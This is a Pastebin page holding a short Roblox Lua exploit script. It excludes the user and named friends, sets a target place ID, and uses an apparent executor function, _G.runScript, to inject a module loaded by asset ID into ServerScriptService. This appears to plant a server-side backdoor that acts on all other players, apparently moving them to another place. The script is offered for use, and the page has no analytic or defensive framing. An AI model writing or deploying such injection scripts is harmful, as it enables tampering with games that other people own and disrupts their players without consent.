Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- me = game:GetService("Players").LocalPlayer
- excludelist = {me.Name, "otherfriendnamehere"}
- for i,v in pairs(excludelist) do
- plr = game:GetService("Players"):FindFirstChild(v)
- if plr then
- nope = Instance.new("Model", plr)
- nope.Name = "ExceptionHax"
- end
- end
- place = Instance.new("IntValue", game:GetService("Lighting"))
- place.Value = 184844919 --your place id here
- place.Name = "PlaceHax"
- wait(1)
- _G.runScript("require(518616824):Clone().Parent = game.ServerScriptService")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement